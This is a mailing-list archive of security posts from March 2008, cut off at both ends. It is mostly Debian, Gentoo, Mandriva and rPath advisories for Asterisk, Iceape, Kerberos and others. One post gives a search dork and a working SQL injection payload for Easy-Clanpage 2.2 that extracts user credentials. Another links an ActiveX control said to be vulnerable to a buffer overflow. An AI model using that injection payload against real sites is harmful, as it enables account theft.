http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_powerpc.deb
  Size/MD5:  6885298 8336b3f8c45f241a3f71f59354ab8a0e

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_powerpc.deb
  Size/MD5:  1463710 92e0812d91b71bc2ae7b

[SECURITY] [DSA 1525-1] New asterisk packages fix several vulnerabilities

2008-03-20 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1525-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
March 20, 2008http://www.debian.org/security/faq
- 

Package: asterisk
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-6430 CVE-2008-1332 CVE-2008-1333

Several remote vulnerabilities have been discovered in Asterisk, a free
software PBX and telephony toolkit. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2007-6430

Tilghman Lesher discovered that database-based registrations are
insufficiently validated. This only affects setups, which are
configured to run without a password and only host-based
authentication.

CVE-2008-1332

Jason Parker discovered that insufficient validation of From:
headers inside the SIP channel driver may lead to authentication
bypass and the potential external initiation of calls.

This update also fixes a format string vulnerability, which can only
be triggered through configuration files under control of the local
administrator. In later releases of Asterisk this issue is remotely
exploitable and tracked as CVE-2008-1333.

For the stable distribution (etch), these problems have been fixed in
version 1:1.2.13~dfsg-2etch3.

The status of the old stable distribution (sarge) is currently being
investigated. If affected, an update will be released through
security.debian.org.

We recommend that you upgrade your asterisk packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3.diff.gz
Size/MD5 checksum:   181527 6a98d3db7fd54a5dd082c692f3e50042
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg.orig.tar.gz
Size/MD5 checksum:  3835589 f8ee088b2e4feffe2b35d78079f90b69
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3.dsc
Size/MD5 checksum: 1488 181da0b7d5a604cd79be518e662b049b

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:  1500218 de67182dd31aef4878322327034ae0ae
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:  1504782 6096881223aafe96ce1285b9be1a97ad
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:   131832 99911d22fb5fbf7f0520d28f0cd21af7
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:73928 0eaff6b096a03f0830a965ed21671557
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:   170126 26798a8026d05a9843a63fa3ac28488e
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3_all.deb
Size/MD5 checksum:   146658 8fd6ec949bdd4fc072b4244f6c97642a

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch3_alpha.deb
Size/MD5 checksum:  1934760 0999adcecf044475a12d9300c8dc2c48
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch3_alpha.deb
Size/MD5 checksum:   137160 f1a2f55ed07f19114ea44639aa2be4a9
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch3_alpha.deb
Size/MD5 checksum:  1898628 637feeb1ac1b25f28330b808bd0597a1

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch3_amd64.deb
Size/MD5 checksum:  1780328 b2c4b1c62ebc4dc13a1ea53a5c842e96
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch3_amd64.deb
Size/MD5 checksum:   133354 1f58ef3241222af34a9ca717eff2c052
  
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch3_amd64.deb
Size/MD5 checksum:  1745634 bd5f2ee7c79247ee6f5944076b9f3442

arm ar

Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

2008-03-20 Thread info
#

##Easy-Clanpage v2.2  ###

# SQL İnjection VuLnerabiLity  ##

   ##

#   #

#

#

# AUTHOR : MadNet

#

# HOMEPAGE : http://www.Shadowturk.org/

#

# Mail : MadNet[at]hackertr[dot]org

#

#

#

#Source: http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14

#

# 

#Dork :"Easy-Clanpage v2.2"

##

#Vunl File :

#

#/inc/module/online.php

#

#EXPLOIT :

#

#http://www.[site].com/[path]/?section=user&action=details&id=

#

#EXAMPLE :

#

#-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*

#

##

#www.ShadowTURK.Org  

##

Thanks : Str0ke and Milw0rm

##



Pizco vulnerable to buffer overflow in activex

2008-03-20 Thread david130490
It's possible that users that uses Pizco were vulnerable to the same 
vulnerability that "Aurigma ImageUploader4.ocx" that found Elazar Broad.


This post is this:

http://www.securityfocus.com/bid/27539



The version of ImageUploader4 is 4.1.36.0


And I say that it's possible because I find a site  where I download it, but I 
don't saw where the Activex control is used.


Web with the vulnerable control:

http://cdnimg.piczo.com/images/uploader/piczo_fast_uploader.cab





[SECURITY] [DSA 1506-2] New iceape packages fix regression

2008-03-20 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1506-2  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
March 20, 2008http://www.debian.org/security/faq
- 

Package: iceape
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415
 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591
 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594

A regression has been fixed in iceape's frame handling code. For
reference you can find the original update below:

Several remote vulnerabilities have been discovered in the Iceape internet
suite, an unbranded version of the Seamonkey Internet Suite. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0412

Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul
Nickerson discovered crashes in the layout engine, which might allow
the execution of arbitrary code.

CVE-2008-0413

Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown",
Philip Taylor and "tgirmann" discovered crashes in the Javascript
engine, which might allow the execution of arbitrary code.

CVE-2008-0414

"hong" and Gregory Fleisher discovered that file input focus
vulnerabilities in the file upload control could allow information
disclosure of local files.

CVE-2008-0415

"moz_bug_r_a4" and Boris Zbarsky discovered discovered several
vulnerabilities in Javascript handling, which could allow
privilege escalation.

CVE-2008-0417

Justin Dolske discovered that the password storage machanism could
be abused by malicious web sites to corrupt existing saved passwords.

CVE-2008-0418

Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory
traversal vulnerability in chrome: URI handling could lead to
information disclosure.

CVE-2008-0419

David Bloom discovered a race condition in the image handling of
designMode elements, which can lead to information disclosure or
potentially the execution of arbitrary code.

CVE-2008-0591

Michal Zalewski discovered that timers protecting security-sensitive
dialogs (which disable dialog elements until a timeout is reached)
could be bypassed by window focus changes through Javascript.

CVE-2008-0592

It was discovered that malformed content declarations of saved
attachments could prevent a user in the opening local files
with a ".txt" file name, resulting in minor denial of service.

CVE-2008-0593

Martin Straka discovered that insecure stylesheet handling during
redirects could lead to information disclosure.

CVE-2008-0594

Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing
protections could be bypassed with  elements.

For the stable distribution (etch), these problems have been fixed in
version 1.0.12~pre080131b-0etch2.

The Mozilla releases from the old stable distribution (sarge) are no
longer supported with security updates.

We recommend that you upgrade your iceape packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch2.diff.gz
Size/MD5 checksum:   270995 2a621606e7f50a736f0d071ade4fd52f
  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b.orig.tar.gz
Size/MD5 checksum: 43535826 39071cd311888d73254336b782109776
  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch2.dsc
Size/MD5 checksum: 1439 9763d1c74ce4301f14acbefbd9f5f49b

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/i/iceape/iceape-dev_1.0.12~pre080131b-0etch2_all.deb
Size/MD5 checksum:  3927430 ecd67a579a7de22c58812f101a3f8798
  
http://security.debian.org/pool/updates/main/i/iceape/mozilla-psm_1.8+1.0.12~pre080131b-0etch2_all.deb
Size/MD5 checksum:27352 cebcf83eac35b663e96d742a8ce0e22d
  
http://security.debian.org/pool/updates/main/i/iceape/mozilla-js-debugger_1.8+1.0.12~pre080131b-0etch2_all.deb
Size/MD5 checksum:27380 f7e68700518fe223b0a7

[ GLSA 200803-30 ] ssl-cert eclass: Certificate disclosure

2008-03-20 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ssl-cert eclass: Certificate disclosure
  Date: March 20, 2008
  Bugs: #174759
ID: 200803-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An error in the usage of the ssl-cert eclass within multiple ebuilds
might allow for disclosure of generated SSL private keys.

Background
==

The ssl-cert eclass is a code module used by Gentoo ebuilds to generate
SSL certificates.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-admin/conserver   < 8.1.16  >= 8.1.16
  2  mail-mta/postfix < 2.4.6-r2   >= 2.4.6-r2
  *>= 2.3.8-r1
 *>= 2.2.11-r1
  3  net-ftp/netkit-ftpd   < 0.17-r7>= 0.17-r7
  4  net-im/ejabberd< 1.1.3   >= 1.1.3
  5  net-irc/unrealircd   < 3.2.7-r2   >= 3.2.7-r2
  6  net-mail/cyrus-imapd < 2.3.9-r1   >= 2.3.9-r1
  7  net-mail/dovecot  < 1.0.10  >= 1.0.10
  8  net-misc/stunnel  < 4.21-r1>= 4.21-r1
 < 4.0
  9  net-nntp/inn < 2.4.3-r1   >= 2.4.3-r1
---
 9 affected packages on all of their supported architectures.
---

Description
===

Robin Johnson reported that the docert() function provided by
ssl-cert.eclass can be called by source building stages of an ebuild,
such as src_compile() or src_install(), which will result in the
generated SSL keys being included inside binary packages (binpkgs).

Impact
==

A local attacker could recover the SSL keys from publicly readable
binary packages when "emerge" is called with the "--buildpkg (-b)" or
"--buildpkgonly (-B)" option. Remote attackers can recover these keys
if the packages are served to a network. Binary packages built using
"quickpkg" are not affected.

Workaround
==

Do not use pre-generated SSL keys, but use keys that were generated
using a different Certificate Authority.

Resolution
==

Upgrading to newer versions of the above packages will neither remove
possibly compromised SSL certificates, nor old binary packages. Please
remove the certificates installed by Portage, and then emerge an
upgrade to the package.

All Conserver users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/conserver-8.1.16"

All Postfix 2.4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.4.6-r2"

All Postfix 2.3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.3.8-r1"

All Postfix 2.2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.2.11-r1"

All Netkit FTP Server users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-ftp/netkit-ftpd-0.17-r7"

All ejabberd users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/ejabberd-1.1.3"

All UnrealIRCd users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-irc/unrealircd-3.2.7-r2"

All Cyrus IMAP Server users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/cyrus-imapd-2.3.9-r1"

All Dovecot users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.10"

All stunnel 4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/stunnel-4.21"

All InterNetNews users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nntp/inn-2.4.3-r1"

References
==

  [ 1 ] CVE-2008-1383
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1383

Availability


This GLSA and any updates to it are available for 

rPSA-2008-0112-1 krb5 krb5-server krb5-services krb5-test krb5-workstation

2008-03-20 Thread rPath Update Announcements
rPath Security Advisory: 2008-0112-1
Published: 2008-03-19
Products:
rPath Linux 1
rPath Appliance Platform Linux Service 1

Rating: Critical
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2012
https://issues.rpath.com/browse/RPL-2318

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5902
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947

Description:
Previous versions of the krb5 package contain multiple
vulnerabilities, the most serious of which may allow a
remote attacker to execute arbitrary code.

http://wiki.rpath.com/Advisories:rPSA-2008-0112

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


[ MDVSA-2008:071 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:071
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly %execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 d671c7e0f68642556b1ba5a33d26eaf8  
corporate/3.0/i586/ftp-client-krb5-1.3-6.10.C30mdk.i586.rpm
 9e5a2591cee10ed62948f6d30e836863  
corporate/3.0/i586/ftp-server-krb5-1.3-6.10.C30mdk.i586.rpm
 7e8fc318772ff7dcd22f5b1c81bbfe6d  
corporate/3.0/i586/krb5-server-1.3-6.10.C30mdk.i586.rpm
 45838af9454ffc5f6c06a505b4468c83  
corporate/3.0/i586/krb5-workstation-1.3-6.10.C30mdk.i586.rpm
 fbdb6f71d9e2a939bbea33312b74c998  
corporate/3.0/i586/libkrb51-1.3-6.10.C30mdk.i586.rpm
 50f964ee10fc744553a862c918913b03  
corporate/3.0/i586/libkrb51-devel-1.3-6.10.C30mdk.i586.rpm
 667270f39306bd837b08b310a189f75d  
corporate/3.0/i586/telnet-client-krb5-1.3-6.10.C30mdk.i586.rpm
 a5a4a1a64c14164e1755ad37e35cf99d  
corporate/3.0/i586/telnet-server-krb5-1.3-6.10.C30mdk.i586.rpm 
 07535be43a1e339a0ba69cc167fbb530  
corporate/3.0/SRPMS/krb5-1.3-6.10.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 0f693533eea0d49c60b20c40e6b5a872  
corporate/3.0/x86_64/ftp-client-krb5-1.3-6.10.C30mdk.x86_64.rpm
 061429249b1cc62647c3a95d6b2a3d8b  
corporate/3.0/x86_64/ftp-server-krb5-1.3-6.10.C30mdk.x86_64.rpm
 bda82007dd59af28240d51ca020370d1  
corporate/3.0/x86_64/krb5-server-1.3-6.10.C30mdk.x86_64.rpm
 9d7e810eacfc17774ee33a438cdc196d  
corporate/3.0/x86_64/krb5-workstation-1.3-6.10.C30mdk.x86_64.rpm
 b4abcda997c06b142bbae27cf3e617ef  
corporate/3.0/x86_64/lib64krb51-1.3-6.10.C30mdk.x86_64.rpm
 e3692fe347ec21c7fd25a581ef817d66  
corporate/3.0/x86_64/lib64krb51-devel-1.3-6.10.C30mdk.x86_64.rpm
 c5da9da1f3aa15a0966f8d1644748340  
corporate/3.0/x86_64/telnet-client-krb5-1.3-6.10.C30mdk.x86_64.rpm
 fd9ff563b0d3d58705eb3b2b4aeebc11  
corporate/3.0/x86_64/telnet-server-krb5-1.3-6.10.C30mdk.x86_64.rpm 
 07535be43a1e339a0ba69cc167fbb530  
corporate/3.0/SRPMS/krb5-1.3-6.10.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 fa4c3506c056e55862b4db41e134db1c  
mnf/2.0/i586/libkrb51-1.3-6.10.M20mdk.i586.rpm 
 5c5caff1487f3284ba0c9529a831405e  mnf/2.0/SRPMS/krb5-1.3-6.10.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH4WQ2mqjQ0CJFipgRAme0AJ9fNnZituwkl8Yx1PIECEds/A5s0QCg1ETW
G9i9EWrOhEC/prfZ6UhjyX8=
=RDH6
-END PGP SIGNATURE-



[ GLSA 200803-29 ] ViewVC: Multiple vulnerabilities

2008-03-20 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ViewVC: Multiple vulnerabilities
  Date: March 19, 2008
  Bugs: #212288
ID: 200803-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple security issues have been reported in ViewVC, which can be
exploited by malicious people to bypass certain security restrictions.

Background
==

ViewVC is a browser interface for CVS and Subversion version control
repositories.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  www-apps/viewvc   < 1.05  >= 1.05

Description
===

Multiple unspecified errors were reportedly fixed by the ViewVC
development team.

Impact
==

A remote attacker could send a specially crafted URL to the server to
list CVS or SVN commits on "all-forbidden" files, access hidden CVSROOT
folders, and view restricted content via the revision view, the log
history, or the diff view.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ViewVC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/viewvc-1.05"

References
==

  [ 1 ] CVE-2008-1290
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1290
  [ 2 ] CVE-2008-1291
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1291
  [ 3 ] CVE-2008-1292
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1292

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-29.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




signature.asc
Description: OpenPGP digital signature


[ MDVSA-2008:070 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:070
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A memory management flaw was found in the GSSAPI library used by
 Kerberos that could result in an attempt to free already freed memory,
 possibly leading to a crash or allowing the execution of arbitrary code
 (CVE-2007-5971).
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly %execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 A flaw in the RPC library as used in Kerberos' kadmind was discovered
 by Jeff Altman of Secure Endpoints.  An unauthenticated remote attacker
 could use this vulnerability to crash kadmind or possibly execute
 arbitrary code in systems with certain resource limits configured;
 this does not affect the default resource limits used by Mandriva Linux
 (CVE-2008-0947).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 ef17fea5e296992fb34b0d00540b4190  
2007.0/i586/ftp-client-krb5-1.4.3-7.4mdv2007.0.i586.rpm
 dbc47795968f03dff7eb50ff34a63b8d  
2007.0/i586/ftp-server-krb5-1.4.3-7.4mdv2007.0.i586.rpm
 36f5b4160b9dc7d4393b8bc5f4f0b6fb  
2007.0/i586/krb5-server-1.4.3-7.4mdv2007.0.i586.rpm
 f76121f223836939aef1f77164a7224d  
2007.0/i586/krb5-workstation-1.4.3-7.4mdv2007.0.i586.rpm
 65c052a4916406626b3289abdb43e0a6  
2007.0/i586/libkrb53-1.4.3-7.4mdv2007.0.i586.rpm
 e50117c585a8560813bc93704562e726  
2007.0/i586/libkrb53-devel-1.4.3-7.4mdv2007.0.i586.rpm
 1f99498d879f9343510479f2791245ac  
2007.0/i586/telnet-client-krb5-1.4.3-7.4mdv2007.0.i586.rpm
 9ed009750d2bcf738ceefce2e4c69512  
2007.0/i586/telnet-server-krb5-1.4.3-7.4mdv2007.0.i586.rpm 
 9e63ac2d698d562ead71d5dd8c7ae315  2007.0/SRPMS/krb5-1.4.3-7.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 029aad278f01c2baef9f93b86b0bc20d  
2007.0/x86_64/ftp-client-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm
 dae016ff39d8e4d9f517b3197eefd926  
2007.0/x86_64/ftp-server-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm
 8b3fac7b20798715efdad0d0db6b4472  
2007.0/x86_64/krb5-server-1.4.3-7.4mdv2007.0.x86_64.rpm
 81f6c05a73c175b581790532aa8572f1  
2007.0/x86_64/krb5-workstation-1.4.3-7.4mdv2007.0.x86_64.rpm
 41e10d5f06e05ea4cf455a0c3420d09f  
2007.0/x86_64/lib64krb53-1.4.3-7.4mdv2007.0.x86_64.rpm
 eeebf59564375187f01f628be3ac5132  
2007.0/x86_64/lib64krb53-devel-1.4.3-7.4mdv2007.0.x86_64.rpm
 cff3b7303e5d157e4ef246867ba396e8  
2007.0/x86_64/telnet-client-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm
 ee55c784f89a1190efb9ce619ba34227  
2007.0/x86_64/telnet-server-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm 
 9e63ac2d698d562ead71d5dd8c7ae315  2007.0/SRPMS/krb5-1.4.3-7.4mdv2007.0.src.rpm

 Corporate 4.0:
 d4dcc40949ba7e72823de561b2b5b050  
corporate/4.0/i586/ftp-client-krb5-1.4.3-5.6.20060mlcs4.i586.rpm
 5e8b8cf4c051f235f2b4a3cc2a8c967c  
corporate/4.0/i586/ftp-server-krb5-1.4.3-5.6.20060mlcs4.i586.rpm
 3c5812da62cc9a0cea89306877386ef7  
corporate/4.0/i586/krb5-server-1.4.3-5.6.20060mlcs4.i586.rpm
 40b114f22d7109a125cdf5243160c5f1  
corporate/4.0/i586/krb5-workstation-1.4.3-5.6.20060mlcs4.i586.rpm
 db7506751e5178556652b74d81b06c6d  
corporate/4.0/i586/libkrb53-1.4.3-5.6.20060mlcs4.i586.rpm
 59ec6c3b207538656f2645eb3c0adf6a  
corporate/4.0/i586/libkrb53-devel-1.4.3-5.6.20060mlcs4.i586.rpm
 fe234b5f259def09b88fba24869eba83  
corporate/4.0/i586/telnet-client-krb5-1.4.3-5.6.20060mlcs4.i586.rpm
 e2b51de61c9a91686e98a05ea98ec05f  
corporate/4.0/i586/telnet-server-krb5-1.4.3-5.6.20060mlcs4.i586.rpm 
 6a739594760cabeb536550168eefb333  
corporate/4.0/SRPMS/k

[ MDVSA-2008:069 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:069
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: 2007.1, 2008.0
 ___
 
 Problem Description:
 
 Multiple memory management flaws were found in the GSSAPI library
 used by Kerberos that could result in the use of already freed memory
 or an attempt to free already freed memory, possibly leading to a
 crash or allowing the execution of arbitrary code (CVE-2007-5901,
 CVE-2007-5971).
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly %execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 A flaw in the RPC library as used in Kerberos' kadmind was discovered
 by Jeff Altman of Secure Endpoints.  An unauthenticated remote attacker
 could use this vulnerability to crash kadmind or possibly execute
 arbitrary code in systems with certain resource limits configured;
 this does not affect the default resource limits used by Mandriva Linux
 (CVE-2008-0947).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
